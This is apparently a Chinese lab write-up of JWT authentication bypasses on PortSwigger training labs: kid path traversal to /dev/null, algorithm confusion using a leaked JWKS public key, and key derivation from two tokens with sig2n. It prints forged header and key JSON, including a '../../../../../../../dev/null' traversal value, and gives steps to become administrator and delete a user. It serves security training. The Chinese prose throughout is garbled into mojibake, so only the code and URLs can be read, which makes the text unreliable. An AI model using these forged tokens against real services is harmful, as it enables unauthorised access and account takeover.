·þÎñÆ÷¿ÉÄÜÊ¹ÓÃ¼¸¸öÃÜÔ¿À´Ç©Êð²»Í¬ÖÖÀàµÄÊý¾Ý£¬Òò´ËJWTµÄ±¨Í·¿ÉÄÜ°üº¬kid(ÃÜÔ¿id)²ÎÊý£¬ÕâÓÐÖúÓÚ·þÎñÆ÷ÔÚÑéÖ¤Ç©ÃûÊ±È·¶¨Ê¹ÓÃÄÄ¸öÃÜÔ¿£¬ÑéÖ¤ÃÜÔ¿Í¨³£´æ´¢ÎªÒ»¸öJWK¼¯£¬ÔÚÕâÖÖÇé¿öÏÂ·þÎñÆ÷¿ÉÒÔ¼òµ¥µØ²éÕÒÓëÁîÅÆ¾ßÓÐÏàÍ¬kidµÄJWK£¬È»¶øJWS¹æ·¶Ã»ÓÐÎªÕâ¸öID¶¨Òå¾ßÌåµÄ½á¹¹¡ª¡ªËüÖ»ÊÇ¿ª·¢ÈËÔ±Ñ¡ÔñµÄÈÎÒâ×Ö·û´®£¬ÀýÈç:ËüÃÇ¿ÉÄÜÊ¹ÓÃkid²ÎÊýÖ¸ÏòÊý¾Ý¿âÖÐµÄÌØ¶¨ÌõÄ¿£¬ÉõÖÁÊÇÎÄ¼þµÄÃû³Æ£¬Èç¹ûÕâ¸ö²ÎÊýÒ²ÈÝÒ×ÊÜµ½Ä¿Â¼±éÀúµÄ¹¥»÷£¬¹¥»÷Õß¿ÉÄÜ»áÆÈÊ¹·þÎñÆ÷Ê¹ÓÃÆäÎÄ¼þÏµÍ³ÖÐµÄÈÎÒâÎÄ¼þ×÷ÎªÑéÖ¤ÃÜÔ¿£¬ÀýÈç£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "kid": "../../path/to/file", 
    "typ": "JWT", 
    "alg": "HS256", 
    "k": "asGsADas3421-dfh9DGN-AFDFDbasfd8-anfjkvc" 
}

</div>

Èç¹û·þÎñÆ÷Ò²Ö§³ÖÊ¹ÓÃ¶Ô³ÆËã·¨Ç©ÃûµÄjwt¾Í»áÌØ±ðÎ£ÏÕ£¬ÔÚÕâÖÖÇé¿öÏÂ¹¥»÷Õß¿ÉÄÜ»á½«kid²ÎÊýÖ¸ÏòÒ»¸ö¿ÉÔ¤²âµÄ¾²Ì¬ÎÄ¼þ£¬È»ºóÊ¹ÓÃÓë¸ÃÎÄ¼þÄÚÈÝÆ¥ÅäµÄÃØÃÜ¶ÔJWT½øÐÐÇ©Ãû£¬´ÓÀíÂÛÉÏ½²Äú¿ÉÒÔ¶ÔÈÎºÎÎÄ¼þÕâÑù×ö£¬µ«ÊÇ×î¼òµ¥µÄ·½·¨Ö®Ò»ÊÇÊ¹ÓÃ/dev/null£¬ÕâÔÚ´ó¶àÊýLinuxÏµÍ³ÉÏ¶¼´æÔÚ£¬ÓÉÓÚÕâÊÇÒ»¸ö¿ÕÎÄ¼þ£¬¶ÁÈ¡Ëü½«·µ»ØÒ»¸ö¿Õ×Ö·û´®£¬Òò´ËÓÃ¿Õ×Ö·û´®¶ÔÁîÅÆ½øÐÐÇ©Ãû½«»á²úÉúÓÐÐ§µÄÇ©Ãû 
°Ð³¡µØÖ·£ºhttps://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal





Step 1£ºµã»÷ÉÏ·½"Access The Lab"½øÈë°Ð³¡





Step 2£ºµÇÂ¼°Ð³¡





Step 3£ºµÇÂ¼ºó½øÈëµ½ÈçÏÂÓÊÏä¸üÐÂ½çÃæ





Step 4£ºÊ¹ÓÃburpsuiteµÄ²å¼þÉú³ÉÒ»¸ö¶Ô³ÆÃÜÔ¿(Symmetric Key)²¢½«kµÄÖµÐÞ¸ÄÎª"AA=="¼´Îªnull

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "kty": "oct", 
    "kid": "38576880-33b7-4446-ade4-f1a78bb6d5c2", 
    "k": "AA==" 
}

</div>




Step 5£ºÀ¹½ØÒ»¸öÇëÇó½«Æä·¢ËÍµ½repeatÄ£¿é





Step 6£º´ËÊ±Ö±½Ó·ÃÎÊ/admin¡ª¡ªÌáÊ¾"401 Unauthorized"





Step 7£ºÔÚJSON Web Token½çÃæÖÐÐÞ¸ÄkidÖµºÍsub½øÐÐÄ¿Â¼±éÀú£¬ÕâÀïµÄ"/dev/null"ÎÄ¼þÃûÓë"AA=="Ò»ÖÂ¶¼Îªnull£¬¶Ô³ÆÃÜÔ¿£¬ËùÒÔ¿ÉÒÔ³É¹¦ÈÆ¹ý

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "kid": "../../../../../../../dev/null", 
    "alg": "HS256" 
}

</div>




Step 8£ºµã»÷signÑ¡ÔñOCT8 µÄÃÜÔ¿¹¥»÷








Step 9£º³É¹¦Ô½È¨





Step 10£ºµ÷ÓÃÃô¸Ð½Ó¿ÚÉ¾³ýcarlosÓÃ»§Íê³É½âÌâ








JWTËã·¨»ìÏý


Ëã·¨»ìÏý


Ëã·¨»ìÏý¹¥»÷(Ò²³ÆÎªÃÜÔ¿»ìÏý¹¥»÷)ÊÇÖ¸¹¥»÷ÕßÄÜ¹»ÆÈÊ¹·þÎñÆ÷Ê¹ÓÃ²»Í¬ÓÚÍøÕ¾¿ª·¢ÈËÔ±Ô¤ÆÚµÄËã·¨À´ÑéÖ¤JSON webÁîÅÆ(JWT)µÄÇ©Ãû£¬ÕâÖÖÇé¿öÈç¹û´¦Àí²»µ±£¬¹¥»÷Õß¿ÉÄÜ»áÎ±Ôì°üº¬ÈÎÒâÖµµÄÓÐÐ§jwt¶øÎÞÐèÖªµÀ·þÎñÆ÷µÄÃØÃÜÇ©ÃûÃÜÔ¿ 
JWT¿ÉÒÔÊ¹ÓÃÒ»ÏµÁÐ²»Í¬µÄËã·¨½øÐÐÇ©Ãû£¬ÆäÖÐÒ»Ð©£¬ÀýÈç:HS256(HMAC+SHA-256)Ê¹ÓÃ"¶Ô³Æ"ÃÜÔ¿£¬ÕâÒâÎ¶×Å·þÎñÆ÷Ê¹ÓÃµ¥¸öÃÜÔ¿¶ÔÁîÅÆ½øÐÐÇ©ÃûºÍÑéÖ¤£¬ÏÔÈ»ÕâÐèÒªÏñÃÜÂëÒ»Ñù±£ÃÜ





ÆäËûËã·¨£¬ÀýÈç:RS256(RSA+SHA-256)Ê¹ÓÃ"·Ç¶Ô³Æ"ÃÜÔ¿¶Ô£¬ËüÓÉÒ»¸öË½Ô¿ºÍÒ»¸öÊýÑ§ÉÏÏà¹ØµÄ¹«Ô¿×é³É£¬Ë½Ô¿ÓÃÓÚ·þÎñÆ÷¶ÔÁîÅÆ½øÐÐÇ©Ãû£¬¹«Ô¿¿ÉÓÃÓÚÑéÖ¤Ç©Ãû£¬¹ËÃûË¼Òå£¬Ë½Ô¿±ØÐë±£ÃÜ£¬µ«¹«Ô¿Í¨³£ÊÇ¹²ÏíµÄ£¬ÕâÑùÈÎºÎÈË¶¼¿ÉÒÔÑéÖ¤·þÎñÆ÷·¢³öµÄÁîÅÆµÄÇ©Ãû





»ìÏý¹¥»÷


Ëã·¨»ìÂÒÂ©¶´Í¨³£ÊÇÓÉÓÚJWT¿âµÄÊµÏÖ´æÔÚÈ±ÏÝ¶øµ¼ÖÂµÄ£¬¾¡¹ÜÊµ¼ÊµÄÑéÖ¤¹ý³ÌÒòËùÊ¹ÓÃµÄËã·¨¶øÒì£¬µ«Ðí¶à¿â¶¼Ìá¹©ÁËÒ»ÖÖÓëËã·¨ÎÞ¹ØµÄ·½·¨À´ÑéÖ¤Ç©Ãû£¬ÕâÐ©·½·¨ÒÀÀµÓÚÁîÅÆÍ·ÖÐµÄalg²ÎÊýÀ´È·¶¨ËüÃÇÓ¦¸ÃÖ´ÐÐµÄÑéÖ¤ÀàÐÍ£¬ÏÂÃæµÄÎ±´úÂëÏÔÊ¾ÁËÒ»¸ö¼òµ¥µÄÊ¾Àý£¬ËµÃ÷ÁËÕâ¸ö·ºÐÍverify()·½·¨ÔÚJWT¿âÖÐµÄÉùÃ÷£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
function verify(token, secretOrPublicKey){ 
    algorithm = token.getAlgHeader(); 
    if(algorithm == "RS256"){ 
        // Use the provided key as an RSA public key 
    } else if (algorithm == "HS256"){ 
        // Use the provided key as an HMAC secret key 
    } 
}

</div>

Ê¹ÓÃÕâÖÖ·½·¨µÄÍøÕ¾¿ª·¢ÈËÔ±ÈÏÎªËü½«×¨ÃÅ´¦ÀíÊ¹ÓÃRS256ÕâÑùµÄ·Ç¶Ô³ÆËã·¨Ç©ÃûµÄJWTÊ±£¬ÎÊÌâ¾Í³öÏÖÁË£¬ÓÉÓÚÕâ¸öÓÐÈ±ÏÝµÄ¼ÙÉèËûÃÇ¿ÉÄÜ×ÜÊÇ´«µÝÒ»¸ö¹Ì¶¨µÄ¹«Ô¿¸ø·½·¨£¬ÈçÏÂËùÊ¾:

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
publicKey = <public-key-of-server>; 
token = request.getCookie("session"); 
verify(token, publicKey);

</div>

ÔÚÕâÖÖÇé¿öÏÂÈç¹û·þÎñÆ÷½ÓÊÕµ½Ê¹ÓÃ¶Ô³ÆËã·¨(ÀýÈç:HS256)Ç©ÃûµÄÁîÅÆ£¬¿âÍ¨ÓÃverify()·½·¨»á½«¹«Ô¿ÊÓÎªHMACÃÜÔ¿£¬ÕâÒâÎ¶×Å¹¥»÷Õß¿ÉÒÔÊ¹ÓÃHS256ºÍ¹«Ô¿¶ÔÁîÅÆ½øÐÐÇ©Ãû£¬¶ø·þÎñÆ÷½«Ê¹ÓÃÏàÍ¬µÄ¹«Ô¿À´ÑéÖ¤Ç©Ãû(±¸×¢:ÓÃÓÚÇ©ÊðÁîÅÆµÄ¹«Ô¿±ØÐëÓë´æ´¢ÔÚ·þÎñÆ÷ÉÏµÄ¹«Ô¿ÍêÈ«ÏàÍ¬£¬Õâ°üÀ¨Ê¹ÓÃÏàÍ¬µÄ¸ñÊ½(ÈçX.509 PEM)²¢±£ÁôÈÎºÎ·Ç´òÓ¡×Ö·û£¬ÀýÈç:»»ÐÐ·û,ÔÚÊµ¼ùÖÐÄú¿ÉÄÜÐèÒª³¢ÊÔ²»Í¬µÄ¸ñÊ½²ÅÄÜÊ¹ÕâÖÖ¹¥»÷×àÐ§) 
¹¥»÷Á÷³Ì¼òÒ×ÊÓÍ¼ÈçÏÂ£º





¹¥»÷ÑÝÊ¾


°Ð³¡µØÖ·£ºhttps://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion





Step 1£ºµã»÷"Access the lab"·ÃÎÊ°Ð³¡





Step 2£ºÊ¹ÓÃÕË»§ÃÜÂëµÇÂ¼





Step 3£ºµÇÂ¼Ö®ºó½øÈëµ½ÓÃ»§ÓÊÏä¸üÐÂ²Ù×÷½çÃæ





Step 4£º·þÎñÆ÷ÓÐÊ±Í¨¹ýÓ³Éäµ½/jwks.json»ò/.well-known/jwks.jsonµÄ¶Ëµã½«ËüÃÇµÄ¹«Ô¿¹«¿ªÎªJSON Web Key(JWK)¶ÔÏó£¬±ÈÈç´ó¼ÒÊìÖªµÄ/jwks.json£¬ÕâÐ©¿ÉÄÜ±»´æ´¢ÔÚÒ»¸ö³ÆÎªÃÜÔ¿µÄjwkÊý×éÖÐ£¬Õâ¾ÍÊÇÖÚËùÖÜÖªµÄJWK¼¯ºÏ£¬¼´Ê¹ÃÜÔ¿Ã»ÓÐ¹«¿ª£¬ÄúÒ²¿ÉÒÔ´ÓÒ»¶ÔÏÖÓÐµÄjwtÖÐÌáÈ¡Ëü

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "keys": [ 
        { 
            "kty": "RSA", 
            "e": "AQAB", 
            "kid": "75d0ef47-af89-47a9-9061-7c02a610d5ab", 
            "n": "o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ" 
        }, 
        { 
            "kty": "RSA", 
            "e": "AQAB", 
            "kid": "d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA", 
            "n": "fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw" 
        } 
    ] 
}

</div>

ÓÚÊÇºõÎÒÃÇ¿ÉÒÔÖ±½Ó·ÃÎÊ/jwks.json½Ó¿Ú»ñÈ¡µ½·þÎñÆ÷µÄ¹«Ô¿ÐÅÏ¢£¬ÔÚ´Ë´¦ÎÒÃÇ½«JWK¸´ÖÆÏÂÀ´£¬×÷ÎªÎÒÃÇµÚ¶þ²¿µÄRSA Key 
https://0aad003404004c0b817dcff9004c0050.web-security-academy.net/jwks.json

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
  "keys": [ 
    { 
      "kty": "RSA", 
      "e": "AQAB", 
      "use": "sig", 
      "kid": "63624c36-bfd8-4146-888e-6d032ad4fe18", 
      "alg": "RS256", 
      "n": "zsiIsVqAKSpOnOxMKrI0hT3p8m_NK3VoejFnt4Hx2CFzvJsZ4_9mmoIVwi_nXYr7NtNV7stOSS4MGzYdJ57t4v83B9h7uI1fdKSp-L-cisg31S0Wm5B_LDnvuABFMcShJ-DKTgEYfLHaG31JudlyJdnfgNIIa0XL-wbGh7Xshf8RtzR8FC2DfApX_-KXYNnHxnTKTPXl5unBgCxyny2n2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY-E2FXIoPIt8m_VSXlsKyZpjpfXTJJZo_IqazAl1XBW6bjwWjxwee0Xbyt7M1_1dTKjaAw" 
    } 
  ] 
}

</div>

 





 
Step 5£ºÔÚBurpsuiteµÄJWT Editor KeysÖÐµã»÷"New RSA Key"£¬ÓÃÖ®Ç°Ð¹Â¶µÄJWK¶øÉú³ÉÒ»¸öÐÂµÄRSA Key

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
      "kty": "RSA", 
      "e": "AQAB", 
      "use": "sig", 
      "kid": "63624c36-bfd8-4146-888e-6d032ad4fe18", 
      "alg": "RS256", 
      "n": "zsiIsVqAKSpOnOxMKrI0hT3p8m_NK3VoejFnt4Hx2CFzvJsZ4_9mmoIVwi_nXYr7NtNV7stOSS4MGzYdJ57t4v83B9h7uI1fdKSp-L-cisg31S0Wm5B_LDnvuABFMcShJ-DKTgEYfLHaG31JudlyJdnfgNIIa0XL-wbGh7Xshf8RtzR8FC2DfApX_-KXYNnHxnTKTPXl5unBgCxyny2n2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY-E2FXIoPIt8m_VSXlsKyZpjpfXTJJZo_IqazAl1XBW6bjwWjxwee0Xbyt7M1_1dTKjaAw" 
}

</div>




Step 6£ºÑ¡ÖÐ"Copy Public Key as PEM"£¬Í¬Ê±½«Æä½øÐÐbase64±àÂë²Ù×÷£¬±£´æÒ»ÏÂµÃµ½µÄ×Ö·û´®(±¸×¢:ÉÏÏÂµÄÒ»´®-----END PUBLIC KEY-----²»ÒªÉ¾µô)

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
-----BEGIN PUBLIC KEY----- 
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzsiIsVqAKSpOnOxMKrI0 
hT3p8m/NK3VoejFnt4Hx2CFzvJsZ4/9mmoIVwi/nXYr7NtNV7stOSS4MGzYdJ57t 
4v83B9h7uI1fdKSp+L+cisg31S0Wm5B/LDnvuABFMcShJ+DKTgEYfLHaG31Judly 
JdnfgNIIa0XL+wbGh7Xshf8RtzR8FC2DfApX/+KXYNnHxnTKTPXl5unBgCxyny2n 
2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY+E2 
FXIoPIt8m/VSXlsKyZpjpfXTJJZo/IqazAl1XBW6bjwWjxwee0Xbyt7M1/1dTKja 
AwIDAQAB 
-----END PUBLIC KEY-----

</div>




base64ºó½á¹û£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF6c2lJc1ZxQUtTcE9uT3hNS3JJMApoVDNwOG0vTkszVm9lakZudDRIeDJDRnp2SnNaNC85bW1vSVZ3aS9uWFlyN050TlY3c3RPU1M0TUd6WWRKNTd0CjR2ODNCOWg3dUkxZmRLU3ArTCtjaXNnMzFTMFdtNUIvTERudnVBQkZNY1NoSitES1RnRVlmTEhhRzMxSnVkbHkKSmRuZmdOSUlhMFhMK3diR2g3WHNoZjhSdHpSOEZDMkRmQXBYLytLWFlObkh4blRLVFBYbDV1bkJnQ3h5bnkybgoyQ3dvQ0lpWWV0N3M3WDFjM3Fod2t0V2s2eEpUbXZrcmQ4NUtCbERTeUVqQmhFUFBYcmJWZnFvOHNOeGtZK0UyCkZYSW9QSXQ4bS9WU1hsc0t5WnBqcGZYVEpKWm8vSXFhekFsMVhCVzZiandXanh3ZWUwWGJ5dDdNMS8xZFRLamEKQXdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==

</div>




Step 7£ºÔÚJWT Editor Keys´¦£¬Éú³ÉÐÂµÄ¶Ô³Æ¼ÓÃÜKey£¬ÓÃÖ®Ç°±£´æµÄbase64±àÂëÈ¥Ìæ»»kµÄÖµ

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "kty": "oct", 
    "kid": "63b7b785-4d35-4cb7-bbc6-9d9e17dcf5fe", 
    "k": "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF6c2lJc1ZxQUtTcE9uT3hNS3JJMApoVDNwOG0vTkszVm9lakZudDRIeDJDRnp2SnNaNC85bW1vSVZ3aS9uWFlyN050TlY3c3RPU1M0TUd6WWRKNTd0CjR2ODNCOWg3dUkxZmRLU3ArTCtjaXNnMzFTMFdtNUIvTERudnVBQkZNY1NoSitES1RnRVlmTEhhRzMxSnVkbHkKSmRuZmdOSUlhMFhMK3diR2g3WHNoZjhSdHpSOEZDMkRmQXBYLytLWFlObkh4blRLVFBYbDV1bkJnQ3h5bnkybgoyQ3dvQ0lpWWV0N3M3WDFjM3Fod2t0V2s2eEpUbXZrcmQ4NUtCbERTeUVqQmhFUFBYcmJWZnFvOHNOeGtZK0UyCkZYSW9QSXQ4bS9WU1hsc0t5WnBqcGZYVEpKWm8vSXFhekFsMVhCVzZiandXanh3ZWUwWGJ5dDdNMS8xZFRLamEKQXdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==" 
}

</div>




Step 8£º²¶»ñÇëÇóÊý¾Ý±¨²¢½«Æä·¢ËÍµ½repeatÄ£¿é





´ËÊ±Ö±½ÓÇëÇó/adminÊÇÎÞ·¨ÇëÇóµ½µÄ





Step 9£ºËæºóÐÞ¸ÄalgÎªHS256£¬ÐÞ¸ÄsubÎªadministrator²¢½øÐÐSign²Ù×÷





Step 10£ºÖØÐÂ·¢ËÍÊý¾Ý°ü¿ÉÒÔ¿´µ½»ØÏÔ³É¹¦





Step 11£ºÇëÇóÃô¸ÐÁ¬½ÓÉ¾³ýÓÃ»§Íê³É½âÌâ








ÁîÅÆÅÉÉú¹«Ô¿


»ù±¾½éÉÜ


ÔÚ¹«Ô¿²»¿ÉÓÃµÄÇé¿öÏÂÄúÈÔÈ»¿ÉÒÔÍ¨¹ýÊ¹ÓÃjwt _ forgery.pyÖ®ÀàµÄ¹¤¾ß´ÓÒ»¶ÔÏÖÓÐµÄJWTÖÐ»ñÈ¡ÃÜÔ¿À´²âÊÔËã·¨»ìÏý£¬Äú¿ÉÒÔÔÚrsa_sign2n GitHub´æ´¢¿âÖÐÕÒµ½¼¸¸öÓÐÓÃµÄ½Å±¾ 
https://github.com/silentsignal/rsa_sign2n





¼òÒ×Ê¾Àý


°Ð³¡µØÖ·£º 
https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion-with-no-exposed-key





Step 1£º°²×°³£¹æ²Ù×÷µÇÂ¼µÇ³ö£¬ÔÙµÇÂ¼£¬»ñÈ¡Á½¸öJWT





Ëæºó½«Æä·Åµ½PortÌá¹©µÄdocker¹¤¾ßÀïÃæÔËÐÐ£¬ÔËÐÐµÄÃüÁîÈçÏÂ

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
docker run --rm -it portswigger/sig2n <token1> <token2>

</div>




jwt _ forgery.py½Å±¾»áÊä³öÒ»ÏµÁÐtokenµÄ´æÔÚÇé¿öÖµ





Step 2£ºÕâÀïÎÒÃÇ³¢ÊÔÃ¿Ò»¸öTempered JWT£¬PortÕâÀï¸øÁËÌáÊ¾ËµÊÇX.509 ÐÎÊ½µÄ£¬ËùÒÔÎÒÃÇÖ»ÐèÒª½«X.509ÐÎÊ½µÄJWT½øÐÐÑéÖ¤¼´¿É£¬µ±Response»ØÓ¦200Ê±´ú±ítokenÊÇÓÐÐ§µÄ£¬ÈôÎª302Ôò´ú±íÁËÖØ¶¨Ïò£¬ÏÂÍ¼ÊÇÒ»¸ö³É¹¦µÄ°¸Àý





Step 3£º½«JWTµÄBase64±àÂëÄÃ¹ýÀ´ÏÈ·Åµ½¼ÇÊÂ±¾ÀïÃæÔÝ´æ£¬ÔÚBurpsuiteµÄJWT Editor Keysµã»÷New Symmetric Key£¬½«ÉÏÃæµÄBase64±àÂëÄÃ¹ýÀ´Ìæ»»´Ë¶Ô³ÆÃÜÔ¿µÄkÖµ£¬Éú³É¶Ô³ÆÃÜÔ¿Ö®ºó½øÐÐºÍÖ®Ç°¹¥»÷Ò»ÖÂµÄSign²Ù×÷





Ãô¸ÐÐÅÏ¢Ð¹Â¶


»ù±¾½éÉÜ


JWTÃô¸ÐÐÅÏ¢Ð¹Â¶ÊÇÖ¸¹¥»÷ÕßÍ¨¹ýÄ³ÖÖ·½Ê½»ñÈ¡ÁËJWTÖÐ°üº¬µÄÃô¸ÐÐÅÏ¢£¬ÀýÈç:ÓÃ»§µÄÉí·Ý¡¢È¨ÏÞ»òÆäËûÃô¸ÐÊý¾Ý£¬ÕâÖÖ¹¥»÷¿ÉÄÜ»áµ¼ÖÂ¶ñÒâÓÃ»§Ã°³äºÏ·¨ÓÃ»§Ö´ÐÐÎ´¾ÊÚÈ¨µÄ²Ù×÷»òÕß·ÃÎÊÃô¸ÐÐÅÏ¢£¬³£¼ûµÄJWTÃô¸ÐÐÅÏ¢Ð¹Â¶·½Ê½°üÀ¨£º

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
ÇÔÈ¡JWT£º¹¥»÷ÕßÍ¨¹ýÇÔÈ¡JWTÁîÅÆÀ´»ñÈ¡ÆäÖÐµÄÃô¸ÐÐÅÏ¢£¬Õâ¿ÉÒÔÍ¨¹ýÇÔÈ¡´æ´¢ÔÚ¿Í»§¶ËµÄJWTÁîÅÆ»òÕßÍ¨¹ý¹¥»÷·þÎñÆ÷¶ËµÄJWTÇ©ÃûËã·¨À´ÊµÏÖ
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
ÇÔÈ¡ÔØºÉ£º¹¥»÷Õß¿ÉÒÔÔÚ´«Êä¹ý³ÌÖÐÇÔÈ¡JWTµÄÔØºÉ²¿·Ö£¬Õâ¿ÉÒÔÍ¨¹ýÇÔÌýÍøÂçÁ÷Á¿»òÕßÀ¹½ØJWTÁîÅÆÀ´ÊµÏÖ
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
±©Á¦ÆÆ½â£º¹¥»÷Õß¿ÉÒÔÍ¨¹ý±©Á¦ÆÆ½âJWTÇ©ÃûËã·¨À´»ñÈ¡JWTÖÐ°üº¬µÄÃô¸ÐÐÅÏ¢
</li>
</ul>

¼òÒ×Ê¾Àý


°Ð³¡µØÖ·£ºhttps://authlab.digi.ninja/Leaky_JWT


